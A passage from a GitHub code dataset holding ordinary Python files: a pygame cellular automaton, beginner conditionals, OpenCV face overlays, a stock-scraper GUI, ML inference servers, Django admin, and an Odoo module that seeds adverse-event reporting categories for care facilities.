init_pygame(self):\n pygame.init()\n self._screen = pygame.display.set_mode(self._screen_size)\n\n def set_algorithm(self, algorithm: IAutomatonAlgorithm):\n self._automaton_algorithm = algorithm\n\n def start(self):\n while True:\n self._cpu_tick()\n if cur_time() <= self._next_fps_tick:\n continue\n self._next_fps_tick = cur_time() + self._fps_cooldown\n self._fps_tick()\n\n def _cpu_tick(self):\n self._handle_exit_event()\n self._handle_keyboard()\n self._handle_mouse()\n\n def _fps_tick(self):\n self._screen.fill(colors.BLACK)\n if self._automaton_algorithm and self._algorithm_started:\n self._automaton_algorithm.automata_tick(self)\n self._draw_alive_cells()\n pygame.display.flip()\n\n def _handle_exit_event(self):\n quit_events = pygame.event.get(eventtype=pygame.QUIT)\n if len(quit_events) > 0:\n sys.exit()\n\n def _handle_keyboard(self):\n for event in pygame.event.get(eventtype=pygame.KEYDOWN):\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self._algorithm_started = not self._algorithm_started\n\n def _handle_mouse(self):\n mouse_events = [\n *pygame.event.get(eventtype=pygame.MOUSEMOTION),\n *pygame.event.get(eventtype=pygame.MOUSEBUTTONDOWN),\n ]\n if len(mouse_events) == 0:\n return\n add, _, remove = pygame.mouse.get_pressed(num_buttons=3)\n if not any([add, remove]):\n return\n\n pos = pygame.mouse.get_pos()\n cell_x, cell_y = int(pos[0] / self._cell_sizes[0]), int(pos[1] / self._cell_sizes[1])\n\n if add:\n self._alive_cell(cell_x, cell_y)\n elif remove:\n self._kill_cell(cell_x, cell_y)\n\n def _get_cell(self, x, y):\n return self._map.get((x, y))\n\n def _set_cell(self, x, y, cell):\n key = (x, y)\n if not cell:\n del self._map[key]\n else:\n self._map[key] = cell\n\n def _is_alive(self, x, y):\n return self._get_cell(x, y)\n\n def _in_limits(self, x, y):\n return (\n 0 <= x < self._cell_limits[0] and\n 0 <= y < self._cell_limits[1]\n )\n\n def _alive_cell(self, x, y):\n if self._is_alive(x, y) or not self._in_limits(x, y):\n return\n\n color = colors.RANDOM_NEAR(colors.AZURE)\n alive_cell = AliveCell(x, y, color)\n self._set_cell(x, y, alive_cell)\n\n def _kill_cell(self, x, y):\n if not self._is_alive(x, y) or not self._in_limits(x, y):\n return\n\n self._set_cell(x, y, None)\n\n def _draw_alive_cells(self):\n for cell in self._map.values():\n self._draw_cell(cell)\n\n def _draw_cell(self, cell: AliveCell):\n start = cell.x * self._cell_sizes[0], cell.y * self._cell_sizes[1]\n pygame.draw.rect(self._screen, cell.color, pygame.Rect(*start, self._cell_sizes[0], self._cell_sizes[1]))\n\n\n","repo_name":"StalkerRaftik/CellularAutomata","sub_path":"src/automaton.py","file_name":"automaton.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70257711665","text":"# las condiciones nos permiten realizar una accion si estas se cumplen o realizar otra si no lo hacen\n# se escriben, if condicion: accion a relizar si se cumple else: accion a realizar si no se cumple\na = 1\nb = 1\n\nif a < b:\n print(\"A es menor que B\")\nelif a == b:\n print(\"A es igual a B\")\nelse:\n print(\"A es mayor que B\")\n\n\n# no solo sirven para comparar\nc = False\n\nif c:\n print(\"C es verdadero\")\nelse:\n print(\"C es falso\")\n\n\n# se puede usar is en ocasiones, para comparar\nd = True\n\nif type(d) is bool:\n print(\"D es booleano\")\nelse:\n print(\"D es otro tipo de dato\")\n\n\n# se ocupa and para que se cumplan varias condiciones\ne = 10\nf = 5\ng = 1\n\nif e > f and f > g:\n print(\"Las 2 condiciones son verdaderas\")\n\n\n# se ocupa or para validar si al menos una de las condicones se cumple\nh = 9\ni = 1\nj = 4\n\nif h > j or j == i:\n print(\"Una de las condicones se cumplio\")","repo_name":"Aokrams/Python-basico","sub_path":"condiciones.py","file_name":"condiciones.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22964069776","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# アニメ顔分類器\n# https://github.com/nagadomi/lbpcascade_animeface\n# 動画で検出サンプル\n# http://www.takunoko.com/blog/python%E3%81%A7%E9%81%8A%E3%82%93%E3%81%A7%E3%81%BF%E3%82%8B-part1-opencv%E3%81%A7%E9%A1%94%E8%AA%8D%E8%AD%98/\n\n\nimport cv2\nfrom functions import check_img, is_front_face, get_alphachannel, fill_void, is_skin, get_hair_color_hsv\nfrom frame_manager import FacesManager\nfrom aikatsu_charactors_detection import detect_aikatsu_charactors, AIKATSU_NAMES\n\nCASCADE_PATH = \"./cascade/lbpcascade_animeface.xml\"\n# IN_VIDEO_PATH = \"./test_imgs/nanohaAs_promotion_video.mp4\"\nIN_VIDEO_PATH = \"./test_imgs/hirari-hitori-kirari.mp4\"\n# IN_VIDEO_PATH = \"./test_imgs/aikatsu_calendargirl_edited.mp4\"\n# IN_VIDEO_PATH = \"./test_imgs/calendargirl_short.mp4\"\nOUT_VIDEO_PATH = \"./test_imgs/output.avi\"\nOVERLAY_IMG_PATH = \"./test_imgs/face_up3.jpg\"\nFRAME_SIZE = (1920, 1080)\nFPS = 30.0\nCHECK_IMG_FLAG = False\n\nOVERLAY_IMG_MAP = {\n AIKATSU_NAMES[0]: cv2.imread(\"./test_imgs/overlays/murata.jpg\", -1),\n AIKATSU_NAMES[1]: cv2.imread(\"./test_imgs/overlays/ambe.jpg\", -1),\n AIKATSU_NAMES[2]: cv2.imread(\"./test_imgs/overlays/kon.jpg\", -1),\n AIKATSU_NAMES[3]: cv2.imread(\"./test_imgs/overlays/matsuno.jpg\", -1),\n AIKATSU_NAMES[4]: cv2.imread(\"./test_imgs/overlays/fukushima.jpg\", -1),\n AIKATSU_NAMES[5]: cv2.imread(\"./test_imgs/overlays/kato.jpg\", -1),\n AIKATSU_NAMES[6]: cv2.imread(\"./test_imgs/overlays/konishi.jpg\", -1),\n AIKATSU_NAMES[7]: cv2.imread(\"./test_imgs/overlays/ota.jpg\", -1)\n}\n\n\ndef switch_overlay_img(face_img):\n # name, hsv = detect_aikatsu_charactors['anime_based']['bgr_diff'](get_hair_color_hsv(face_img))\n # return OVERLAY_IMG_MAP[name]\n return OVERLAY_IMG_MAP[AIKATSU_NAMES[0]]\n\n\ndef overlay(faces, rgb_img, cascade):\n if len(faces) <= 0:\n return rgb_img\n\n for (x, y, w, h) in faces:\n face_img = rgb_img[y:y + h, x:x + w]\n # if w < 40:\n # continue\n if not is_skin(face_img):\n continue\n\n overlay_img = switch_overlay_img(face_img)\n resized_overlay_img = cv2.resize(overlay_img, tuple((w, h)))\n # alpha_channel = fill_void(get_alphachannel(face_img))\n # mask_img = cv2.bitwise_and(resized_overlay_img, resized_overlay_img,\n # mask=alpha_channel)\n mask_img = overlay_img\n for i, j in [(i, j) for i in range(h) for j in range(w)]:\n if any(mask_img[i, j]):\n rgb_img[y + i, x + j] = mask_img[i, j]\n\n return rgb_img\n\n\n# --------------------------------------------\nif __name__ == '__main__':\n\n cascade = cv2.CascadeClassifier(CASCADE_PATH)\n\n cap = cv2.VideoCapture(IN_VIDEO_PATH)\n out = cv2.VideoWriter(filename=OUT_VIDEO_PATH, fourcc=0,\n fps=FPS, frameSize=FRAME_SIZE)\n frame_idx = 0\n faces_mgr = FacesManager()\n\n try:\n while cap.isOpened():\n frame_idx += 1\n if frame_idx % 50 == 0:\n print(\"frame : %d\" % frame_idx)\n\n ret, frame = cap.read()\n # if ret is False:\n # print('false')\n # out.write(frame)\n # continue\n faces = cascade.detectMultiScale(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY),\n scaleFactor=1.1, minNeighbors=1, minSize=(1, 1))\n # if frame_idx == 1:\n # faces_mgr.initialize(frame, faces)\n # continue\n\n # frame, faces = faces_mgr.append(frame, faces).get()\n overlayed_frame = overlay(faces, frame, cascade)\n out.write(overlayed_frame)\n\n # frame, faces = faces_mgr.get()\n # frame, faces = faces_mgr.append(frame, faces).get()\n # overlayed_frame = overlay(faces, frame, cascade)\n # out.write(overlayed_frame)\n except:\n pass\n else:\n cap.release()\n cv2.destroyAllWindows()\n out.release()\n","repo_name":"mu-777/image_processing_tests","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9710076542","text":"from cgitb import enable\nfrom tkinter import *\nfrom WebScraper import getStockPriceDict, scrapeStockPrice\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport pandas as pd\n\nglobal stockPriceHistory\nstockPriceHistory = []\nglobal counter\ncounter = [0]\n\ndef clickFunc():\n global stock\n stock = entry.get()\n\n if(stock != \"\"):\n global newLabel\n stockPrice = scrapeStockPrice(stock)\n stockPriceHistory.append(stockPrice)\n if(stockPrice == \"-1\"):\n newLabel = Label(root, text=\"INVALID STOCK TICKER\", font=(\"Courier\", 12))\n newLabel.pack()\n newButton['state'] = DISABLED\n return\n newLabel = Label(root, text=\"The price of \" + stock + \" is $\" + stockPrice, font=(\"Courier\", 12))\n newLabel.pack()\n newButton['state'] = DISABLED\n\ndef deleteStock():\n newLabel.destroy()\n newButton['state'] = ACTIVE\n stockPriceHistory.clear()\n return\n\ndef animateGraph(i):\n print(\"counter \" + str(counter))\n print(\"history \" + str(stockPriceHistory))\n\n plt.cla()\n plt.plot(counter, stockPriceHistory)\n\n counter.append(counter[-1] + 20)\n stockPriceHistory.append(float(scrapeStockPrice(stock)))\n return\n\ndef startGraph():\n plt.style.use('fivethirtyeight')\n plt.tight_layout()\n ani = FuncAnimation(plt.gcf(), animateGraph, interval = 20000)\n \n plt.show()\n return\n\nroot = Tk(className=\"StockWebScraper\")\nroot.geometry(\"300x300\")\nroot.resizable(width=False, height=False)\n\n\nentry = Entry(root, width=\"30\")\nentry.insert(0, \"Ex. AMD, MSFT, SPY...\")\nentry.pack()\n\nnewButton = Button(root, text=\"Add stock ticker\", pady=\"20\", padx=\"30\", command=clickFunc)\nnewButton.pack()\n\ndeleteButton = Button(root, text=\"Remove stock ticker\", pady=\"20\", padx=\"30\", command=deleteStock)\ndeleteButton.pack()\n\ngraphButton = Button(root, text=\"Graph current stock\", pady=\"20\", padx=\"30\", command=startGraph)\ngraphButton.pack()\n\n\nroot.mainloop()","repo_name":"BWS3000/PyStockScraper","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30909641140","text":"#\n# @lc app=leetcode.cn id=124 lang=python3\n#\n# [124] 二叉树中的最大路径和\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\"\"\" \n后序遍历\nAccepted\n94/94 cases passed (68 ms)\nYour runtime beats 94.12 % of python3 submissions\nYour memory usage beats 20.1 % of python3 submissions (22.5 MB)\n\"\"\"\n\n\nclass Solution:\n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n res = float('-inf')\n\n def handler(node):\n left, right = 0, 0\n if node.left:\n left = max(handler(node.left), 0)\n if node.right:\n right = max(handler(node.right), 0)\n nonlocal res\n res = max(res, left + right + node.val)\n return max(left, right) + node.val\n\n handler(root)\n\n return int(res)\n# @lc code=end\n","repo_name":"slybootslion/LeetCodeExercise","sub_path":"Python3/124.二叉树中的最大路径和.py","file_name":"124.二叉树中的最大路径和.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16598009930","text":"import joblib\nimport pandas as pd\nfrom fastapi.encoders import jsonable_encoder\n\nfrom src import params\n\n\ndef construct_df(input):\n df = pd.DataFrame(jsonable_encoder(input))\n df = df.set_axis([\n 'Patient Age at Treatment',\n 'Total Number of Previous IVF cycles',\n 'Total number of IVF pregnancies',\n 'Total number of live births - conceived through IVF',\n 'Type of Infertility - Female Primary',\n 'Type of Infertility - Female Secondary',\n 'Type of Infertility - Male Primary',\n 'Type of Infertility - Male Secondary',\n 'Type of Infertility -Couple Primary',\n 'Type of Infertility -Couple Secondary',\n 'Cause of Infertility - Tubal disease',\n 'Cause of Infertility - Ovulatory Disorder',\n 'Cause of Infertility - Male Factor',\n 'Cause of Infertility - Patient Unexplained',\n 'Cause of Infertility - Endometriosis',\n 'Cause of Infertility - Cervical factors',\n 'Cause of Infertility - Partner Sperm Concentration',\n 'Cause of Infertility - Partner Sperm Morphology',\n 'Causes of Infertility - Partner Sperm Motility',\n 'Fresh Cycle',\n 'Frozen Cycle',\n 'Eggs Thawed',\n 'Fresh Eggs Collected',\n 'Eggs Mixed With Partner Sperm',\n 'Embryos Transfered'\n ], axis=1, inplace=False)\n\n return df\n\n\ndef predict(input):\n model = joblib.load(f'./{params.model}')\n\n x_input = construct_df(input)\n y_predicted = model.predict(x_input)\n\n return y_predicted\n","repo_name":"zain3ie/pm_dev","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29671644038","text":"# app.py\n# author:Ren\n# Date: 20211001\nimport json\nfrom flask import Flask, jsonify, request\nfrom tensorflow.keras.models import load_model\nfrom inference import chest_inference\napp = Flask(__name__)\n\n\n\n@app.route('/predict', methods = ['POST'])\ndef predict():\n json_data = request.get_json() #Get the POSTed json\n dict_data = json.loads(json_data)\n img_str = dict_data['img_str']\n result = chest_inference(img_str, tube_model_pred, pneumo_model_pred)\n return jsonify(result)\n\nif __name__ == \"__main__\":\n # parameters\n tube_weight_path = \"./weights/tube/06_chest_npz_aug10_zero2one_512x512_valWOaug_clahe_centercrop/checkpoint-20-0.985-0.040.h5\"\n pneumo_weight_path = \"./weights/pneumo/01_pneumo_npz_aug10_normalize1024_512x512_valWOaug_densenet/checkpoint-24-0.951-0.247.h5\"\n # load tube model\n tube_model_pred = load_model(tube_weight_path)\n # load pneumo model\n pneumo_model_pred = load_model(pneumo_weight_path)\n app.run(host = \"0.0.0.0\", port = 8080)\n","repo_name":"superRenh/2021aigo_chestxray","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"1854292001","text":"from django.contrib import admin\nfrom .models import Artist, Album, Track, Blog\n\n\nclass AlbumInline(admin.TabularInline):\n model = Album\n extra = 1\n\n\nclass TrackInline(admin.TabularInline):\n model = Track\n extra = 1\n\n\nclass ArtistAdmin(admin.ModelAdmin):\n fieldsets = [\n ('Images', {'fields': ['artist_picture']}),\n ('Artist Information', {'fields': ['artist_name']}),\n ]\n inlines = [AlbumInline]\n\n\nclass AlbumAdmin(admin.ModelAdmin):\n fieldsets = [\n ('Images', {'fields': ['album_cover']}),\n ('Album Information', {'fields': ['artist', 'album_name', 'album_genre',\n 'album_year', 'album_review']}),\n ]\n inlines = [TrackInline]\n\n\nclass TrackAdmin(admin.ModelAdmin):\n fields = ['track_number', 'track_title', 'youtube_link']\n\n\nclass BlogAdmin(admin.ModelAdmin):\n fields = ['blog_title', 'blog_date', 'blog_post']\n\nadmin.site.register(Artist, ArtistAdmin)\nadmin.site.register(Album, AlbumAdmin)\nadmin.site.register(Track, TrackAdmin)\nadmin.site.register(Blog, BlogAdmin)\n","repo_name":"shoshseiden/shoshs_musicbox","sub_path":"shoshs_musicbox/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19069342430","text":"import os\nimport json\nfrom gensim.models import KeyedVectors\n\n\ndef input_fn(request_body, request_content_type):\n print(f\"request_body: {request_body}\")\n if request_content_type == \"application/json\":\n payload = json.loads(request_body)\n instances = payload[\"instances\"]\n return instances\n else:\n raise Exception(f\"{request_content_type} content type not supported\")\n\n\ndef predict_fn(instances, word_vectors):\n print(f\"instances: {instances}\")\n print(\"calling model\")\n predictions = word_vectors.most_similar(positive=instances)\n return predictions\n\n\ndef model_fn(model_dir):\n print(\"loading model from: {}\".format(model_dir))\n word_vectors = KeyedVectors.load_word2vec_format(os.path.join(model_dir, \"vectors.txt\"), binary=False)\n print(f'word vectors length: {len(word_vectors)}')\n return word_vectors\n","repo_name":"aws-samples/amazon-sagemaker-local-mode","sub_path":"gensim_with_word2vec_model_artifacts_local_serving/code/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"91"}
+{"seq_id":"32897314415","text":"from processing import inverse_scaling\nimport pandas as pd\n\nclass Persistence:\n def __init__(self, horizons):\n self.horizons = horizons\n\n def predict(self, test, scaler, index=None):\n persist = {}\n for h in range(1, self.horizons+1):\n persist[f't+{h}'] = inverse_scaling(test, scaler, h)\n persist = pd.DataFrame(data=persist)\n\n if index is not None:\n persist.index = index\n\n return persist","repo_name":"vitorp4/Data-Science","sub_path":"Regressão com MLP (serie temporal)/persistence.py","file_name":"persistence.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9242269489","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, exceptions, fields, models, _\n\n\nclass add_is_criteres_generaux(models.TransientModel):\n _name = 'add.is.criteres.generaux'\n _description = u\"Initialisation Critères généraux\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.criteres.generaux']\n add_list = [\n [u'Evènement inhabituel par sa nature, son ampleur ou sa gravité', 1],\n [u'Evènement ayant pour conséquence une exclusion temporaire ou définitive', 2],\n [u'Evènement ayant pour conséquence une sanction disciplinaire grave ou une procédure judiciaire à l’encontre de personnels', 3],\n [u'Evènement nécessitant l’activation du Plan Bleu', 4],\n [u'Evènement nécessitant l’activation d’une CUMP', 5],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0], 'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0], 'code': data[1]})\n return True\n\n\nclass add_is_demande_intervention_secours(models.TransientModel):\n _name = 'add.is.demande.intervention.secours'\n _description = u\"Initialisation Demande d’intervention des secours\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.demande.intervention.secours']\n add_list = [\n 'Pompiers',\n 'SAMU',\n 'Police',\n 'Gendarmerie',\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data)])\n if not generaux_ids:\n add_data_obj.create({'name': data})\n return True\n\n\nclass add_is_consequence_personne_prise_en_charge(models.TransientModel):\n _name = 'add.is.consequence.personne.prise.en.charge'\n _description = u\"Initialisation Conséquence pour la personne prises en charge\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.consequence.personne.prise.en.charge']\n add_list = [\n [u'décès', 1],\n ['mise en jeu du pronostic vital', 2],\n [u'probable déficit fonctionnel permanent', 3],\n ['soins internes', 4],\n ['hospitalisation', 5],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0],'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0],'code': data[1]})\n return True\n\n\nclass add_is_consequence_personnel(models.TransientModel):\n _name = 'add.is.consequence.personnel'\n _description = u\"Initialisation Conséquence pour le personnel\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.consequence.personnel']\n add_list = [\n ['interruption temporaire de travail', 1],\n [u'réquisition', 2],\n ['autre (y compris suicide ou tentative de suicide)', 3],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0], 'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0],'code': data[1]})\n return True\n\n\nclass add_is_consequence_fonctionnement_stucture(models.TransientModel):\n _name = 'add.is.consequence.fonctionnement.stucture'\n _description = u\"Initialisation Conséquence pour l’organisation de la structure\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.consequence.fonctionnement.stucture']\n add_list = [\n [u'difficulté d’approvisionnement', 1],\n [u'difficulté d’accès à la structure ou au lieu de prise en charge', 2],\n [u'nécessité de déplacer des résidents', 3],\n [u'suspension d’activité', 4],\n [u\"intervention des forces de l’ordre ou des secours\", 5],\n [u'autre (à préciser)', 6],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0], 'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0],'code': data[1]})\n return True\n\n\nclass add_toutes_tables(models.TransientModel):\n _name = 'add.toutes.tables'\n _description = u\"Initialisation de toutes les tables\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['add.is.criteres.generaux']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.demande.intervention.secours']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.consequence.personne.prise.en.charge']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.consequence.personnel']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.consequence.fonctionnement.stucture']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.nature.evenement']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.destinataire']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.qualite']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.qualite.autre']\n add_data_obj.add_data()\n return True\n\n\nclass add_is_type_evenement(models.TransientModel):\n _name = 'add.is.type.evenement'\n _description = u\"is.type.evenement\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.type.evenement']\n type_data1 = self.env.ref('is_eig12.is_type_evenement_1', False)\n type_data2 = self.env.ref('is_eig12.is_type_evenement_2', False)\n type_data3 = self.env.ref('is_eig12.is_type_evenement_3', False)\n type_data4 = self.env.ref('is_eig12.is_type_evenement_4', False)\n add_dict1 = {\n 'name': 'Situation exceptionnelle',\n 'description': u'Evènement ou dysfonctionnement grave pouvant affecter l’accompagnement des personnes accompagnées ou menacer leur santé, sécurité ou bien-être.',\n 'code': 'SE',\n }\n add_dict2 = {\n 'name': u'Information préoccupante',\n 'description': u'Information à la cellule départementale sur la situation d’un mineur ou d’une personne vulnérable, bénéficiant ou non d’un accompagnement, pouvant laisser craindre que sa santé, sa sécurité ou sa moralité sont en danger ou risque de l’être ou que les conditions de son éducation ou développement sont gravement compromises ou en risque de l’être.',\n 'code': 'IP',\n }\n add_dict3 = {\n 'name': u'Signalement au Procureur',\n 'description': u'Transmission à l’autorité judiciaire de l’ensemble des documents écrits concernant des faits graves, des éléments de danger avérés, compromettant le développement du mineur et sollicitant une mesure de protection judiciaire.',\n 'information_speciale': u\"Attention : l'applicatif n'envoie pas automatiquement un courrier aux autorités judiciaires. En cas de signalement aux autorités judiciaires, il est nécessaire d'imprimer le document pdf intitulé 'signalement' généré dans les 'pièces-jointes' de l'applicatif et de l'envoyer par fax à l'autorité judiciaire correspondante. Également, une information préoccupante est automatiquement envoyée au Conseil Départemental, par mail.\",\n 'code': 'SP',\n }\n add_dict4 = {\n 'name': u'Situation exceptionnelle pour public d’AMI ou de CHU',\n 'description': u'Evènement ou dysfonctionnement grave pouvant affecter l’accompagnement des personnes accompagnées ou menacer leur santé, sécurité ou bien-être.',\n 'code': 'SEA',\n }\n \n if type_data1:\n exist_ids = add_data_obj.search([('name', '=', type_data1.name)])\n if not exist_ids:\n add_data_obj.create(add_dict1)\n else:\n for e in exist_ids:\n e.write(add_dict1)\n if type_data2:\n exist_ids = add_data_obj.search([('name', '=', type_data2.name)])\n if not exist_ids:\n add_data_obj.create(add_dict2)\n else:\n for e in exist_ids:\n e.write(add_dict2)\n if type_data3:\n exist_ids = add_data_obj.search([('name', '=', type_data3.name)])\n if not exist_ids:\n add_data_obj.create(add_dict3)\n else:\n for e in exist_ids:\n e.write(add_dict3)\n if type_data4:\n exist_ids = add_data_obj.search([('name', '=', type_data4.name)])\n if not exist_ids:\n add_data_obj.create(add_dict4)\n else:\n for e in exist_ids:\n e.write(add_dict4)\n return True\n\n\nclass add_is_nature_evenement(models.TransientModel):\n _name = 'add.is.nature.evenement'\n _description = u\"Initialisation Nature Evènement \"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.nature.evenement']\n type_data1 = self.env.ref('is_eig12.is_type_evenement_1', False)\n type_data2 = self.env.ref('is_eig12.is_type_evenement_2', False)\n type_data3 = self.env.ref('is_eig12.is_type_evenement_3', False)\n type_data4 = self.env.ref('is_eig12.is_type_evenement_4', False)\n add_list = [\n [u\"Absence imprévue de plusieurs professionnels, mettant en difficulté l’effectivité de l’accompagnement ou la sécurité des personnes accueillies\", 1],\n [u\"Autre (accident ou incident lié à une erreur ou à un défaut de soin ou de surveillance)\", 2],\n [u\"Autre (évènement en santé environnementale)\", 3],\n [u\"Autre (évènement relatif à l’accompagnement des usagers)\", 4],\n [u\"Autre (évènement relatif au fonctionnement et organisation de l’établissement)\", 5],\n [u\"Comportements violents de la part d’usagers à l’égard d’autres usagers\", 6],\n [u\"Comportements violents de la part d’usagers à l’égard de professionnels\", 7],\n [u\"Conflits sociaux ou menaces de conflits sociaux pouvant entraîner un risque pour l’usager\", 8],\n [u\"Décès accidentel ou consécutif à un défaut de surveillance ou de prise en charge de la personne\", 9],\n [u\"Défaillance technique significative et durable\", 10],\n [u\"Difficultés relationnelles récurrentes avec la famille entraînant une perturbation de l’organisation ou du fonctionnement de la structure\", 11],\n [u\"Disparition(s) inquiétante(s) de personne(s) accueillie(s) (services de police ou gendarmeries alertés)\", 12],\n [u\"Epidémie\", 13],\n [u\"Erreur d’identité dans la délivrance d’un médicament\", 14],\n [u\"Fugue(s) inquiétante(s) de personne(s) accueillie(s) (services de police ou gendarmeries alertés)\", 15],\n [u\"Intoxication\", 16],\n [u\"Intrusion informatique\", 17],\n [u\"Légionnelles\", 18],\n [u\"Maladie infectieuse\", 19],\n [u\"Maltraitances non précisées\", 20],\n [u\"Manquements graves au règlement du lieu d’hébergement ou d’accueil qui compromettent la prise en charge\", 21],\n [u\"Mise en danger par dérive sectaire et radicalisation\", 22],\n [u\"Négligences graves ou erreurs successives\", 23],\n [u\"Non-respect de la prescription médicale, erreur dans la dispensation, la préparation ou l’administration\", 24],\n [u\"Présentation de faux diplômes\", 26],\n [u\"Sinistre ou évènement météorologique exceptionnel\", 27],\n [u\"Suicide\", 28],\n [u\"Turn-over du personnel ou grève, mettant en difficulté l’effectivité de l’accompagnement ou la sécurité des personnes accueillies\", 29],\n [u\"Vacance de poste prolongée, notamment d’encadrement, difficulté de recrutement\", 30],\n [u\"Violences médicales ou médicamenteuses\", 31],\n [u\"Vols récurrents à l’encontre des résidents, si dépôt de plainte\", 32],\n ]\n common_list = [\n [u\"Actes de malveillance au sein de la structure\", 33],\n [u\"Autre (évènement relatif à la sécurité des biens et des personnes)\", 34],\n [u\"Tentative de suicide\", 35],\n [u\"Violences physiques\", 36],\n [u\"Violences psychologiques et morales\", 37],\n [u\"Violences sexuelles\", 38],\n ]\n chu_list = [\n [u\"Accident corporel grave\", 39],\n [u\"Autre (évènements relatifs aux victimes présumées)\", 40],\n [u\"Décès\", 41],\n [u\"Défaillances techniques graves\", 42],\n [u\"Epidémie - Propagation de parasites\", 43],\n [u\"Explosions ou incendie ou inondation\", 44],\n [u\"Fugues ou disparition de personnes accueillies > à 48 H\", 45],\n [u\"Intoxication alimentaire si plusieurs personnes sont concernées\", 46],\n [u\"Négligences graves de l’entourage\", 47],\n [u\"Racket\", 48],\n [u\"Trafic au sein de l’établissement\", 49],\n [u\"Vols récurrents et /ou qualifiés à l’encontre des autres résidents et ou des salariés ou des bénévoles\", 50],\n ]\n if type_data1 and type_data2 and type_data3:\n for data in add_list:\n nature_ids = add_data_obj.search([('name', '=', data[0])])\n if not nature_ids:\n create_id = add_data_obj.create({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,create_id.id)]\n type_data2.is_nature_ids = [(4,create_id.id)]\n type_data3.is_nature_ids = [(4,create_id.id)]\n else:\n for n in nature_ids:\n n.write({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data2.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data3.is_nature_ids = [(4,nature_ids.ids[0])]\n if type_data1 and type_data2 and type_data3 and type_data4:\n for data in common_list:\n nature_ids = add_data_obj.search([('name', '=', data[0])])\n if not nature_ids:\n create_id = add_data_obj.create({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,create_id.id)]\n type_data2.is_nature_ids = [(4,create_id.id)]\n type_data3.is_nature_ids = [(4,create_id.id)]\n type_data4.is_nature_ids = [(4,create_id.id)]\n else:\n for n in nature_ids:\n n.write({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data2.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data3.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data4.is_nature_ids = [(4,nature_ids.ids[0])]\n if type_data4:\n for data in chu_list:\n nature_ids = add_data_obj.search([('name', '=', data[0])])\n if not nature_ids:\n create_id = add_data_obj.create({'name': data[0], 'code': data[1]})\n type_data4.is_nature_ids = [(4,create_id.id)]\n else:\n for n in nature_ids:\n n.write({'name': data[0], 'code': data[1]})\n type_data4.is_nature_ids = 